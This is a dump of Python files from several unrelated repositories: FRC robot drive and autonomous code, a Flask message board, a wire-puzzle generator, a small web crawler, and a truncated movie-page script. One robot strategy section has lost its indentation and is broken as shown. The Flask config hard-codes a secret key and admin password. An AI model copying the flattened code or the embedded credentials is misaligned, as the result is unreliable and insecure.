        auto.add("drop1", self.drop_tote(1), after="drive1")
        auto.add("drive1.5", self.auto_drive_until_liftable(), after="drop1")
        auto.add("pickup2", self.auto_pickup_tote(), after="drive1.5")
        auto.add("drive2", self.auto_drive_until_tote(), after="pickup2")
        auto.add("drop2", self.drop_tote(2), after="drive2")
        auto.add("drive2.5", self.auto_drive_until_liftable(), after="drop2")
        auto.add("pickup3", self.auto_pickup_tote(), after="drive2.5")
        self.auto = auto

    def autonomousPeriodic(self):
        # Advance every active generator by one control tick.
        self.auto.next()

    def auto_pickup_tote(self):
        """Generator: raise the winch by one tote height, flipping the
        claw up once the winch passes 70 revs."""
        robot = self.robot
        assert robot.get_winch_revs() < 20
        tote_revs = 330  # winch revs per tote of lift (empirical -- TODO confirm)
        robot.winch_setpoint = robot.winch_setpoint_zero + tote_revs
        durped = False
        while robot.get_winch_revs() < robot.winch_setpoint:
            if not durped and robot.get_winch_revs() >= 70:
                robot.claw_up()
                durped = True
            self.winch_value = 1.0
            yield
        self.winch_value = 0.0
        yield

    def auto_drive_until_tote(self):
        """Generator: drive forward ~306 right-encoder ticks to reach
        the next tote."""
        robot = self.robot
        revs0 = robot.right_encoder.get()
        while True:
            val = robot.right_encoder.get()
            if val > revs0 + 306:
                break
            robot.forward(0.5)
            yield
        yield

    def maintain_winch(self):
        # Runs for the whole autonomous period, applying whatever power
        # the active stage requested via self.winch_value.
        while True:
            self.robot.winch_set(self.winch_value)
            yield

    def auto_drive_until_liftable(self):
        """Generator: nudge forward 60 encoder ticks so the claw can
        reach the next tote."""
        robot = self.robot
        revs0 = robot.right_encoder.get()
        while robot.right_encoder.get() <= revs0 + 60:
            robot.forward(0.5)
            yield

    def drop_tote(self, i):
        """Generator: lower the stack back to the floor.  Once the winch
        is below +290 revs it schedules a short backup and re-parents the
        following drive stage behind it by editing the scheduler's
        dependency table directly."""
        robot = self.robot
        robot.winch_setpoint = robot.winch_setpoint_zero
        while robot.get_winch_revs() > robot.winch_setpoint_zero + 10:
            self.winch_value = -1.0
            # The generators-membership check makes the re-parenting
            # happen at most once per drop.
            if robot.get_winch_revs() < robot.winch_setpoint_zero + 290 and \
                    ("drop%s" % i) in self.auto.generators:
                self.auto.add("back", self.backup())
                # put drivei.5 behind "back"
                x = self.auto.afters["drop%s" % i].pop()
                assert x[0] == ("drive%s.5" % i)
                self.auto.afters["back"] = [x]
            yield
        robot.claw_down()
        self.winch_value = 0.0
        yield

    def backup(self):
        # Reverse briefly so the claw clears the dropped stack.
        for i in range(30):
            self.robot.forward(-0.4)
            yield
class ContainerStrategy:
    def __init__(self, robot):
        # Register this strategy on the shared robot under 'container'.
        self.robot = robot
        self.robot.strategies['container'] = self

    def autonomousInit(self):
        # Reset the state machine driven by autonomousPeriodic.
        self.auto_state = "start"
        self.positioned_count = 0
def autonomousPeriodic(self):
"""
Autonomous mode for picking up recycling containers
Note: run variable "auto_mode" should be set to "container"
Current implementation can also pick up and score a single tote
"""
robot = self.robot
# state "start": claw should be down to pick up totes/containers
if self.auto_state == "start":
robot.claw_down()
robot.set_claw()
self.auto_state = "lift"
# state "lift": lift up to pick up container
if self.auto_state == "lift":
if robot.get_winch_revs() < 500:
robot.winch_motor.set(.5)
else:
self.auto_state = "clawout"
# state "clawout": push out solenoid
if self.auto_state == "clawout":
robot.claw_up()
robot.set_claw()
self.auto_state = "turn"
# do i want to do a 180 degree turn here?
if self.auto_state == "turn":
done_turning = self.turn_brake(180)
if done_turning:
self.auto_state = "drive"
# state "drive": drive over the bump
if self.auto_state == "drive":
if self.positioned_count < 190:
robot.forward(.6)
self.positioned_count += 1
robot.winch_motor.set(0.1 -
0.01 * (robot.get_winch_revs() - 500))
else:
self.positioned_count = 0
self.auto_state = "setdown"
# state "setdown": set container down
if self.auto_state == "setdown":
if robot.get_winch_revs() > 15:
robot.winch_motor.set(-.5)
robot.brake_linear()
else:
robot.winch_motor.set(0)
self.auto_state = "clawin"
# state "clawin": claw should be down to release tote/container
if self.auto_state == "clawin":
robot.claw_down()
robot.set_claw()
self.auto_state = "wait"
# state "wait": waits for the claw to pull away from the tote
if self.auto_state == "wait":
if self.positioned_count < 20:
self.positioned_count += 1
else:
self.positioned_count = 0
self.auto_state = "backup"
# state "backup": back up
if self.auto_state == "backup":
if self.positioned_count < 15:
robot.forward(-1)
self.positioned_count += 1
else:
self.positioned_count = 0
self.auto_state = "finished"
# Simplest turn algorithm
# Returns whether it is done turning
def turn_brake(self, angle):
if abs(self.robot.gyro.getAngle()) % 360 < angle:
self.robot.pivot_clockwise(1)
elif abs(self.robot.gyro.getRate()) > .01:
self.robot.brake_rotation()
else:
return True
return False
# Turn should have a slow down so it stops at angle perfectly
def turn(self, angle):
slow_down_angle = 30
remaining_angle = angle - abs(self.robot.gyro.getAngle()) % 360
if abs(remaining_angle) < 1 and abs(self.robot.gyro.getRate()) < .1:
return True
elif abs(remaining_angle) > slow_down_angle:
value = 1
else:
value = (math.sin(remaining_angle *
(180/slow_down_angle) - 90) + 1) / 2
value = math.copysign(value, remaining_angle)
self.robot.pivot_clockwise(value)
return False
| {"/kiwidrive/kiwi.py": ["/kiwidrive/strategies.py"], "/kiwidrive/robot.py": ["/kiwidrive/kiwi.py"]} |
53,566 | wylliec/2015-recycle-rush | refs/heads/master | /kiwidrive/kiwi.py | import math
import wpilib
import kiwidrive.xbox as joy
import kiwidrive.strategies as strats
# Kiwi-drive mixing matrix: one row per drive wheel, columns are the (x, y)
# drive components (see get_wheel_magnitudes).  numpy is imported inside a
# try block so the rest of the module still loads on robots without numpy.
try:
    import numpy as np
    M = np.array(
        [[-1.6, 0.0],
         [ 1.0, -1.0 / math.sqrt(3)],
         [ 1.0, 1.0 / math.sqrt(3)]])
except ImportError:
    print("no numpy; hope you aren't trying to use kiwidrive")
def get_wheel_magnitudes(v, m=None):
    """
    Calculate the magnitudes to drive wheels 1, 2, and 3
    to drive the robot in the direction defined by normalized
    vector v=[x,y].

    Uses the module-level mixing matrix M unless *m* is supplied.
    """
    matrix = M if m is None else m
    return np.dot(matrix, v)
def normalize_joystick_axes(x, y):
    """
    Map the joystick's square axis range onto a circle.

    Each axis reports a value in [-1.0 .. 1.0], so two axes span a "unit
    square"; scale the vector so the reachable region is a unit circle —
    the angle is preserved and full deflection has the same magnitude in
    every direction.

    Return (x, y), the scaled components.
    """
    r = math.hypot(x, y)
    if r == 0.0:
        return 0.0, 0.0
    side = max(abs(x), abs(y))
    return x * side / r, y * side / r
def step(value, min_val):
    """
    Deadband: return *value* unless its magnitude is below *min_val*,
    in which case return 0.
    """
    return 0 if abs(value) < min_val else value
class Smooth:
    """
    Ramp a value toward a target in fixed-size increments so motor power
    changes gradually, reducing jerkiness.
    """
    def __init__(self, val, stp):
        # Current smoothed value and the maximum change allowed per update.
        self.value = val
        self.step = stp

    def set(self, new_val):
        """Move the value at most one step toward *new_val*; return it."""
        if self.value >= new_val:
            self.value = max(self.value - self.step, new_val)
        else:
            self.value = min(self.value + self.step, new_val)
        return self.value

    def force(self, new_val):
        """Jump straight to *new_val*, bypassing the ramp; return it."""
        self.value = new_val
        return self.value
class KiwiDrive:
    """Three-wheel holonomic ("kiwi") drive plus the 2015 game mechanisms:
    winch, arm, pneumatic claw, compressor, gyro-based heading hold, and the
    registered autonomous strategies."""

    def __init__(self, joystick, motors):
        """
        Initialize all of the sensors and controllers on the robot
        """
        # Initialize the Joystick
        self.joy = joy.XboxController(joystick)
        # Initialize the drive motors
        assert len(motors) == 3
        self.motors = motors
        self.tweaks = [1, 1, 1]  # per-wheel scale factors
        # modify values for better driving
        self.m = np.copy(M)
        self.m[:, 1] *= 1.3  # make forward a bit faster
        self.m[:, 0] *= 0.8  # make strafe a bit slower
        self.motor_bias = 0.8  # applied to negative motor outputs
        # Initialize the arm motor
        self.arm_motor = wpilib.Talon(4)
        self.arm_power = Smooth(0.0, 0.01)
        # Initialize the winch motor
        self.winch_motor = wpilib.Talon(3)
        # Initialize the winch encoder
        self.winch_encoder = wpilib.Encoder(1, 2)
        self._winch_encoder_min = 8
        self.last_winch_signal = 0
        # Initialize the compressor
        self.compressor = wpilib.Compressor(0)
        # Initialize the compressor watchdog
        self.dog = wpilib.MotorSafety()
        # self.dog.setExpiration(1.75)
        self.dog.setSafetyEnabled(False)
        # Initialize the pneumatic solenoids for the claw
        self.solenoid1 = wpilib.Solenoid(1)
        self.solenoid2 = wpilib.Solenoid(2)
        self.claw_state = True   # True = claw down/in (see claw_down/claw_up)
        self.claw_toggle = False  # edge-detect latch for the claw button
        # Initialize the accelerometer
        self.accel = wpilib.BuiltInAccelerometer()
        # Initialize the gyro
        self.gyro = wpilib.Gyro(0)
        # Initialize the PID Controller (heading hold; output feeds pidWrite)
        self.pid_correction = 0.0
        self.last_rot = 0.0
        self.last_angle = 0
        self.last_angle_count = 0
        self.waiting_to_reenable = False
        self.pidcontroller = wpilib.PIDController(
            0.015,
            0.0,
            0.0,
            .1,
            lambda: self.getAngle(),
            lambda output: self.pidWrite(output),
        )
        self.pidcontroller.setAbsoluteTolerance(5)
        # Initialize autonomous strategies (each registers itself in
        # self.strategies under its mode name)
        self.strategies = {}
        strats.Auto3StraightStrategy(self)
        strats.TurnStrategy(self)
        strats.ContainerStrategy(self)

    def autonomousInit(self, auto_mode):
        """
        Runs an autonomous mode method based on the selected mode
        """
        assert auto_mode in [
            "container",
            "tote",
            "3-tote-straight",
        ]
        self.auto_mode = auto_mode
        # Record the winch's starting position as zero for this auto run.
        self.winch_setpoint_zero = self.winch_setpoint = self.get_winch_revs()
        self.strategies[self.auto_mode].autonomousInit()
        self.compressor.start()

    def autonomousPeriodic(self):
        """
        Runs an autonomous mode method based on the selected mode
        """
        self.dog.feed()
        self.strategies[self.auto_mode].autonomousPeriodic()

    def maintain_claw(self):
        """Generator: keep re-applying the current claw state every tick."""
        while True:
            self.set_claw()
            yield

    def maintain_winch(self):
        """Generator: keep the winch holding its setpoint (signal 0)."""
        while True:
            self.winch_set(0)
            yield

    def get_winch_revs(self):
        """Winch height in encoder counts (encoder is mounted inverted)."""
        return -self.winch_encoder.get()

    def winch_encoder_min(self):
        """Lower safety bound for the winch, in encoder counts."""
        return self._winch_encoder_min

    def winch_encoder_max(self):
        """Upper safety bound for the winch, in encoder counts."""
        return self._winch_encoder_min + 1162

    def forward(self, val):
        """Drive straight forward/backward at *val* (no strafe, no rotation)."""
        self.RawDrive(0, val, 0)

    def pivot_clockwise(self, val):
        """Rotate in place at *val* (no translation)."""
        self.RawDrive(0, 0, val)

    def Enable(self):
        """Arm heading-hold PID at the current angle and start the compressor."""
        self.pidcontroller.setSetpoint(self.getAngle())
        self.pidcontroller.enable()
        self.winch_setpoint = self.get_winch_revs()
        self.compressor.start()

    def Disable(self):
        """Disable heading-hold PID and stop the compressor."""
        self.pidcontroller.disable()
        self.compressor.stop()

    def getAngle(self):
        """Gyro heading truncated to an int (degrees)."""
        return int(self.gyro.pidGet())

    def Drive(self):
        """Teleop: read the joystick and drive all mechanisms for one tick."""
        x = self.joy.analog_drive_x()
        y = self.joy.analog_drive_y()
        # rot is +1.0 for right trigger, -1.0 for left
        rot = self.joy.analog_rot()
        self.RawDrive(x, y, rot)
        # Feed winch controller raw values from the joystick
        winch_signal = self.joy.analog_winch()
        # Right joystick button 6 overrides encoder,
        # button 7 resets encoder
        self.winch_set(winch_signal)
        # Feed arm controller raw values from the joystick
        # Left joystick button 3 goes forward, 2 goes backward
        arm_signal = self.joy.analog_arm()
        self.arm_motor.set(self.arm_power.set(arm_signal * .3))
        # Handle piston in and out
        # Right joystick trigger button toggles claw in or out
        if self.joy.digital_claw():
            self.claw_toggle = True
        elif self.claw_toggle:
            # Toggle on button release (edge detection).
            self.claw_toggle = False
            self.claw_state = not self.claw_state
            self.set_claw()
        # If the right joystick slider is down, also run test mode
        if self.joy.digital_test():
            self.test_mode()

    def test_mode(self):
        """
        # Test Mode
        # calculates and prints values to be used in testing
        """
        print('legalize crystal fucking weed')
        print('winch revolutions: ', self.get_winch_revs())
        print('angle: ', self.gyro.getAngle())

    def RawDrive(self, x, y, rot):
        """Mix (x, y, rot) into the three wheel outputs, managing the
        heading-hold PID around driver-commanded rotation."""
        xy = normalize_joystick_axes(x, y)
        motor_values = get_wheel_magnitudes(xy, self.m)
        # Deals with rotation and calming down the gyro
        if rot != 0:
            self.pidcontroller.reset()
        if rot == 0 and self.last_rot != 0:
            # Driver just stopped rotating: wait for the gyro to settle
            # before re-enabling heading hold.
            self.waiting_to_reenable = True
            print("WAITING TO REENABLE")
        elif self.waiting_to_reenable:
            if self.last_angle == self.getAngle():
                self.last_angle_count += 1
            else:
                self.last_angle_count = 0
            # Angle unchanged for 10 ticks -> considered settled.
            if self.last_angle_count >= 10:
                self.waiting_to_reenable = False
                self.Enable()
                print("REENABLING")
        self.last_angle = self.getAngle()
        self.last_rot = rot
        for i, motor in enumerate(self.motors):
            val = motor_values[i] * self.tweaks[i]
            val += rot * .3
            if val < 0:
                val *= self.motor_bias
            val += self.pid_correction
            motor.set(val)

    def pidWrite(self, output):
        """PID output sink: stash the heading correction for RawDrive."""
        print("pid output: ", output)
        self.pid_correction = output

    def brake_rotation(self):
        """
        Brakes robot if it's rotating
        by powering the motors in the direction opposite the rotation
        """
        gyro_rate = self.gyro.getRate()
        return self.RawDrive(0, 0, -gyro_rate * .1)

    def brake_linear(self):
        """
        Brakes robot if it's moving forward or backward
        by powering the motors in the direction opposite the movement
        """
        accel_y = self.accel.getY()
        return self.RawDrive(0, -accel_y * .1, 0)

    def set_claw(self):
        """
        # Moves claw into "claw_state" position
        """
        self.solenoid1.set(not self.claw_state)
        self.solenoid2.set(self.claw_state)

    def claw_up(self):
        """
        # Pushes claw out
        """
        self.claw_state = False

    def claw_down(self):
        """
        # Pulls claw in
        """
        self.claw_state = True

    def winch_set(self, signal):
        """
        Set winch controller safely by taking max and min encoder values
        into account, unless you're pressing the override button
        (right joystick, button 6)
        signal=0 -> maintain winch position
        signal>0 -> winch up?
        signal<0 -> winch down?
        """
        # Reset winch encoder value to 0 if right button 7 is pressed
        if self.joy.digital_winch_encoder_reset():
            self.winch_encoder.reset()
        # Initializes "revs" to the winch encoder's current value
        revs = self.get_winch_revs()
        # Sets "winch_setpoint" when driver takes finger off winch button
        if self.last_winch_signal != 0 and signal == 0:
            self.winch_setpoint = revs
        self.last_winch_signal = signal
        # If no winch signal, maintain winch's height position
        # Else moves winch according to winch signal
        if signal == 0:
            # Small P-controller holding the setpoint against gravity.
            val = 0.1 - 0.01 * (revs - self.winch_setpoint)
        else:
            # Pressing right button 6 overrides winch's safety bounds
            if not (self.joy.digital_winch_override()):
                # Stop the winch if it is going out of bounds
                if (((signal > 0.1 and revs >= self.winch_encoder_max()) or
                     (signal < -0.1 and revs <= self.winch_encoder_min()))):
                    signal = 0
            val = 0.5 * signal
        # Sets the winch motor's value
        self.winch_motor.set(val)
53,567 | wylliec/2015-recycle-rush | refs/heads/master | /kiwidrive/robot.py | import wpilib
import kiwidrive.kiwi as kiwi
class Robot(wpilib.IterativeRobot):
    """Top-level robot: wires the joystick and three drive Talons into a
    KiwiDrive and delegates every mode callback to it."""

    def robotInit(self):
        """Create the joystick, the three drive motors, and the KiwiDrive."""
        self.joystick1 = wpilib.Joystick(0)
        self.motor1 = wpilib.Talon(0)
        self.motor2 = wpilib.Talon(1)
        self.motor3 = wpilib.Talon(2)
        self.kiwidrive = kiwi.KiwiDrive(
            self.joystick1,
            [self.motor1,
             self.motor2,
             self.motor3])
        # Select which autonomous mode: "tote", "container", "3-tote-straight"
        self.auto_mode = "3-tote-straight"

    def autonomousInit(self):
        self.kiwidrive.autonomousInit(self.auto_mode)

    def autonomousPeriodic(self):
        self.kiwidrive.autonomousPeriodic()

    def teleopInit(self):
        self.kiwidrive.Enable()

    def disabledInit(self):
        self.kiwidrive.Disable()

    def teleopPeriodic(self):
        self.kiwidrive.Drive()

    def testPeriodic(self):
        pass
# Entry point: hand control to the WPILib runtime.
if __name__ == "__main__":
    wpilib.run(Robot)
| {"/kiwidrive/kiwi.py": ["/kiwidrive/strategies.py"], "/kiwidrive/robot.py": ["/kiwidrive/kiwi.py"]} |
53,568 | wylliec/2015-recycle-rush | refs/heads/master | /runtests.py | import nose
# Run the test suite under nose; "-s" disables stdout capture so prints show.
# (argv[0] fills the program-name slot — presumably arbitrary; confirm against
# nose.main's argv handling.)
if __name__ == '__main__':
    nose.main(argv=['robot', '-s'])
| {"/kiwidrive/kiwi.py": ["/kiwidrive/strategies.py"], "/kiwidrive/robot.py": ["/kiwidrive/kiwi.py"]} |
53,569 | rolf-gutz/linguagemWebAula9 | refs/heads/master | /aplicacao.py | from flask import Flask
import sqlite3
# Application configuration.
DATABASE ='banco.db'
DEBUG = True
# NOTE(review): hard-coded secret key and credentials belong in environment
# variables or an untracked config file, not in source control.
SECRET_KEY = 'development key'
USERNAME = 'admin'
PASSWORD = 'default'
app = Flask(__name__) # Initialize the Flask application module
def conectar_bd():
    """Open and return a new SQLite connection to the configured database."""
    return sqlite3.connect(DATABASE)
| {"/controle.py": ["/aplicacao.py"]} |
53,570 | rolf-gutz/linguagemWebAula9 | refs/heads/master | /controle.py | from aplicacao import app
from flask import render_template
from flask import g
from aplicacao import conectar_bd
@app.before_request
def pre_requesicao():
    """Open a database connection and stash it on flask.g for this request."""
    g.db = conectar_bd()
@app.teardown_request
def encerrar_requisicao(exception):
    """Close the request's database connection, even if the view raised."""
    g.db.close()
@app.route('/')
def index():
    """Render the main page listing all messages, newest first."""
    sql = '''select usuario,texto from mensagens order by id desc'''
    cur = g.db.execute(sql)
    # Shape each (usuario, texto) row as a dict for the template.
    mensagens = [dict(usuario = usuario , texto = texto)
                 for usuario, texto in cur.fetchall()]
    context = {'titulo':'Página Principal',
               'mensagens': mensagens
               }
    return render_template('index.html',**context)
@app.route('/mensagem')
def mensagem():
    """Render the "write a message" form page."""
    context = {'titulo':'Escrever mensagem'}
    return render_template('mensagem.html',**context)
# Start Flask's built-in development server (debug mode; not for production).
app.run(debug=True)
53,599 | Ape/gamegenerator | refs/heads/master | /rules.py | from enum import Enum
# The wire colors used by the puzzle; all red wires must be cut to win
# (see victory()).
Color = Enum("Color", "red green blue yellow")
def wire_colors():
    """Return every available wire color as a list."""
    return [color for color in Color]
def victory(wires):
    """The game is won once no red wires remain (cut wires are None)."""
    return Color.red not in wires
def actions():
    """Return the list of cut rules.

    Each rule is a predicate (wires, cut) -> bool that says whether cutting
    the wire at index *cut* is currently allowed.  Cut wires are represented
    by None; the _prev/_first helpers skip over them.
    """
    return [
        # Cut a red wire if the previous wire is green or if there is no
        # previous wire, and if the next wire is blue or if there is no next
        # wire.
        lambda wires, cut: wires[cut] == Color.red \
            and _prev(wires, cut) in [None, Color.green] \
            and _first(wires, cut+1) in [None, Color.blue],
        # Cut a red wire with exactly two wires before it if the first wire
        # after is also red and the second wire after is not red.
        lambda wires, cut: wires[cut] == Color.red \
            and _num(wires[:cut]) == 2 \
            and _first(wires, cut+1) == Color.red \
            and _first(wires, cut+2) != Color.red,
        # Cut a green wire if the next wire is yellow and there is an odd
        # number of green wires.
        lambda wires, cut: wires[cut] == Color.green \
            and _first(wires, cut+1) == Color.yellow \
            and _num_color(wires, Color.green) % 2 == 1,
        # Cut a green wire if there is exactly one yellow wire and exactly one
        # green wire.
        lambda wires, cut: wires[cut] == Color.green \
            and _num_color(wires, Color.green) == 1 \
            and _num_color(wires, Color.yellow) == 1,
        # Cut a green wire if the last wire is blue and there is an even number
        # of green wires.
        lambda wires, cut: wires[cut] == Color.green \
            and _prev(wires, len(wires)) == Color.blue \
            and _num_color(wires, Color.green) % 2 == 0,
        # Cut a blue wire if there are exactly four wires.
        lambda wires, cut: wires[cut] == Color.blue \
            and _num(wires) == 4,
        # Cut a blue wire if there are as many red wires as there are blue and
        # yellow wires combined.
        lambda wires, cut: wires[cut] == Color.blue \
            and (_num_color(wires, Color.blue)
                 + _num_color(wires, Color.yellow)
                 == _num_color(wires, Color.red)),
        # Cut a yellow wire if the first wire is green and there is an even
        # number of yellow wires.
        lambda wires, cut: wires[cut] == Color.yellow \
            and _first(wires, 0) == Color.green \
            and _num_color(wires, Color.yellow) % 2 == 0,
        # Cut a yellow wire if the first wire is blue and there is an odd
        # number of yellow wires.
        lambda wires, cut: wires[cut] == Color.yellow \
            and _first(wires, 0) == Color.blue \
            and _num_color(wires, Color.yellow) % 2 == 1,
        # Cut a yellow wire if the next wire is red and the previous wire is
        # not yellow.
        lambda wires, cut: wires[cut] == Color.yellow \
            and _prev(wires, cut) != Color.yellow \
            and _first(wires, cut+1) == Color.red,
        # Cut any wire that is not red or green if it is between two green
        # wires with no other colors in between.
        lambda wires, cut: not wires[cut] in [Color.red, Color.green] \
            and _prev(wires, cut) == Color.green \
            and _first(wires, cut+1) == Color.green,
    ]
def _num(wires):
return sum((1 for x in wires if x != None))
def _num_color(wires, color):
return sum((1 for x in wires if x == color))
def _first(wires, index):
try:
return next((x for x in wires[index:] if x != None))
except StopIteration:
return None
def _prev(wires, index):
try:
return next((x for x in reversed(wires[:index]) if x != None))
except StopIteration:
return None
| {"/main.py": ["/rules.py"]} |
53,600 | Ape/gamegenerator | refs/heads/master | /main.py | #!/usr/bin/env python3
import enum
import itertools
import multiprocessing
import random
import time
import rules
# Search-space parameters: wires per game and the acceptable solution-length
# window (games solvable in fewer than MIN_CUTS cuts are rejected as too easy;
# no solutions longer than MAX_CUTS are searched).
NUM_WIRES = 8
MIN_CUTS = 6
MAX_CUTS = 7
THREADS = 4
PROGRESS_INTERVAL = 10 # seconds
# Marker results for games that are rejected rather than solved.
NonSolution = enum.Enum("NonSolution", "too_easy not_possible")
def generate_games(colors):
    """Build every NUM_WIRES-long color sequence that uses all of *colors*,
    shuffled into random order.

    Returns a (games, count) tuple.
    """
    required = set(colors)
    # Cartesian product, keeping only sequences in which every color appears.
    games = [combo for combo in itertools.product(colors, repeat=NUM_WIRES)
             if set(combo) == required]
    # Randomize the order
    random.shuffle(games)
    return (games, len(games))
def solve(game):
    """Search for the shortest valid cut sequence for *game*.

    Returns (game, cuts) when the shortest solution uses MIN_CUTS..MAX_CUTS
    cuts, (game, NonSolution.too_easy) when a shorter solution exists, or
    (game, NonSolution.not_possible) when no solution exists at all.
    """
    # Try cut sequences in increasing length, so the first hit is minimal.
    for num_cuts in range(MAX_CUTS + 1):
        for cuts in itertools.permutations(range(NUM_WIRES), num_cuts):
            if is_solution(game, cuts):
                if num_cuts >= MIN_CUTS:
                    return (game, cuts)
                else:
                    return (game, NonSolution.too_easy)
    else:
        # for/else: runs only if the search exhausted every length.
        return (game, NonSolution.not_possible)
def is_solution(game, cuts):
    """Return True if cutting the wires in *cuts* order wins the game.

    Every cut must be justified by at least one action rule at the moment it
    is made, no cut may happen after victory, and the final state must win.
    """
    wires = list(game)
    for cut in cuts:
        if rules.victory(wires):
            # No extra cuts after victory allowed
            return False
        if all((not x(wires, cut) for x in rules.actions())):
            # There must be an action rule for the cut
            return False
        wires[cut] = None  # a cut wire is represented by None
    return rules.victory(wires)
def solve_interruptable(game):
    """solve() wrapper for pool workers: swallows KeyboardInterrupt
    (implicitly returning None) so Ctrl-C aborts the pool cleanly."""
    try:
        return solve(game)
    except KeyboardInterrupt:
        pass
def print_game(game, solution):
    """Print one accepted game followed by its cut sequence."""
    print()
    print_wires(game)
    solution_text = " ".join(str(cut) for cut in solution)
    print("Solution: {}".format(solution_text))
def print_wires(wires):
    """Print each wire's index and color name, one per line."""
    lines = ["{}: {}".format(pos, wire.name) for pos, wire in enumerate(wires)]
    for line in lines:
        print(line)
def rate(games, start_time):
    """Describe throughput since *start_time* as 'X.XX games per second'."""
    games_per_second = games / (time.time() - start_time)
    return "{:.2f} games per second".format(games_per_second)
def print_stats(games, accepted, too_easy):
    """Print the accepted / too-easy / impossible breakdown for *games*."""
    not_possible = games - accepted - too_easy
    print_stat("accepted", accepted, games)
    print_stat("too easy", too_easy, games)
    print_stat("impossible", not_possible, games)
def print_stat(label, number, games):
    """Print one statistics line with its percentage of *games*."""
    percentage = 100 * number / games
    print("- {} games {} ({:.2f} %)".format(number, label, percentage))
def list_games(pool):
    """Generate all game configurations, solve them across *pool* workers,
    print every accepted game, and report progress and final statistics."""
    print("Generating game configurations...")
    games, num_games = generate_games(rules.wire_colors())
    print("Searching for acceptable games from {} configurations..."
          .format(num_games))
    accepted = 0
    too_easy = 0
    start_time = time.time()
    progress_time = time.time()
    # Results arrive in completion order; each is (game, cuts-or-NonSolution).
    solutions = pool.imap_unordered(solve_interruptable, games)
    for i, (game, solution) in enumerate(solutions):
        # NOTE(review): "solution in NonSolution" with a non-member (a cuts
        # tuple) raises TypeError on Python 3.8-3.11; it returns False only
        # on <3.8 and >=3.12 — confirm the targeted Python version.
        if solution in NonSolution:
            if solution == NonSolution.too_easy:
                too_easy += 1
        else:
            accepted += 1
            print_game(game, solution)
        # Periodic progress report.
        if time.time() - progress_time > PROGRESS_INTERVAL:
            progress_time = time.time()
            print()
            print("Progress: {:.1f} % at {}"
                  .format(100 * i / num_games, rate(i, start_time)))
            print_stats(i, accepted, too_easy)
    print()
    print("Checked {} games at {}"
          .format(num_games, rate(num_games, start_time)))
    print_stats(num_games, accepted, too_easy)
# Entry point: run the search on a worker pool; Ctrl-C tears the pool down.
if __name__ == "__main__":
    with multiprocessing.Pool(THREADS) as pool:
        try:
            list_games(pool)
        except KeyboardInterrupt:
            print()
            print("Aborting...")
            pool.terminate()
| {"/main.py": ["/rules.py"]} |
53,677 | AnshShrivastava/SPY_WEB | refs/heads/master | /general.py | import os
def create_project_dir(directory):
    """Create *directory* (with any missing parents) unless it exists."""
    if os.path.exists(directory):
        return
    print('Creating Project ' + directory)
    os.makedirs(directory)
#create quere and crawled files
def create_data_files(project_name, base_url):
    """Seed the project's queue file with *base_url* and create an empty
    crawled file; existing files are left untouched."""
    queue = project_name + '/queue.txt'
    crawled = project_name + '/crawled.txt'
    for path, seed in ((queue, base_url), (crawled, '')):
        if not os.path.isfile(path):
            write_file(path, seed)
#Create a new file
def write_file(path, data):
    """Create (or overwrite) the file at *path* with *data*."""
    with open(path, 'w') as out:
        out.write(data)
#Add data onto an existing file
def append_file(path, data):
    """Append *data* plus a newline to the file at *path*."""
    with open(path, 'a') as out:
        out.write(data + '\n')
# Clean file
def clear_file(path):
    """Truncate the file at *path* to zero length (creating it if absent)."""
    open(path, 'w').close()
# Read File and Convert into Set Items
def file_to_set(file_name):
    """Read the file and return its lines, newline-stripped, as a set."""
    with open(file_name, 'rt') as f:
        return {line.replace('\n', '') for line in f}
# Iterate through a set, each item will be new line in file
def set_to_file(links, file_name):
    """Write *links* to *file_name*, sorted, one per line (overwrites)."""
    with open(file_name, "w") as f:
        f.write("".join(l + "\n" for l in sorted(links)))
| {"/main.py": ["/general.py"]} |
53,678 | AnshShrivastava/SPY_WEB | refs/heads/master | /main.py | import threading
from queue import Queue
from spider import Spider
from domain import *
from general import *
print("####################################################\n")
print(" Python-based Web Crawler \n")
print("####################################################\n")
print("\n")
# Interactive setup: ask for the start URL, then derive the crawl settings.
HOMEPAGE = input("Enter URL to crawl: ")
PROJECT_NAME = 'SPY_WEB'
DOMAIN_NAME = get_domain_name(HOMEPAGE)
QUEUE_FILE = PROJECT_NAME + '/queue.txt'
CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
NUMBER_OF_THREADS = 2
queue = Queue()
# Instantiating Spider sets up the project files and seeds the crawl.
Spider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)
# Create Threads
# Create Threads
def create_spiders():
    """Spawn NUMBER_OF_THREADS daemon worker threads running work()."""
    for _ in range(NUMBER_OF_THREADS):
        t = threading.Thread(target=work)
        t.daemon = True  # daemon threads exit with the main thread
        t.start()
#Do the next job in queue
#Do the next job in queue
def work():
    """Worker loop: take the next URL off the queue and crawl it."""
    while True:
        url = queue.get()
        Spider.crawl_page(threading.current_thread().name, url)
        queue.task_done()
# Each link is new job
# Each link is new job
def create_job():
    """Queue every URL currently in the queue file, wait until the workers
    drain them, then re-check for newly discovered links."""
    for link in file_to_set(QUEUE_FILE):
        queue.put(link)
    queue.join()
    crawl()
#Check for items and if found, crawl
#Check for items and if found, crawl
def crawl():
    """If the queue file has pending links, report the count and process them."""
    queued_links = file_to_set(QUEUE_FILE)
    if len(queued_links)>0:
        print(str(len(queued_links))+ " links in the queue")
        create_job()
# Start the worker threads, then kick off the first crawl pass.
create_spiders()
crawl()
| {"/main.py": ["/general.py"]} |
53,690 | jesseliy/MachineLearning-P2 | refs/heads/master | /media.py | import webbrowser
class Movie():
    """A movie with the metadata needed to render it on the web page.

    Args:
        movie_title (str): movie's title.
        movie_storyline (str): movie's storyline.
        poster_image (str): poster image's url.
        trailer_youtube (str): trailer's url.

    Attributes:
        title (str): movie's title.
        storyline (str): movie's storyline.
        poster_image_url (str): poster image's url.
        trailer_url (str): trailer's url.
    """

    def __init__(self, movie_title, movie_storyline,
                 poster_image, trailer_youtube):
        self.title = movie_title
        self.storyline = movie_storyline
        self.poster_image_url = poster_image
        self.trailer_url = trailer_youtube

    def show_trailer(self):
        """Open the movie's trailer in the default web browser."""
        # Bug fix: this previously read self.trailer_yotube_url, an attribute
        # that is never set (the constructor stores trailer_url), so calling
        # show_trailer() always raised AttributeError.
        webbrowser.open(self.trailer_url)
| {"/enterainment_center.py": ["/media.py"]} |
53,691 | jesseliy/MachineLearning-P2 | refs/heads/master | /enterainment_center.py | import media
import fresh_tomatoes # A library for creating the web-page
# function definition:
# media.Movie(title,storyline,poster_image,trailer_youtube)
# Build the Movie instances shown on the page.
# function definition:
# media.Movie(title,storyline,poster_image,trailer_youtube)
The_Shawshank_Redemption = media.Movie(
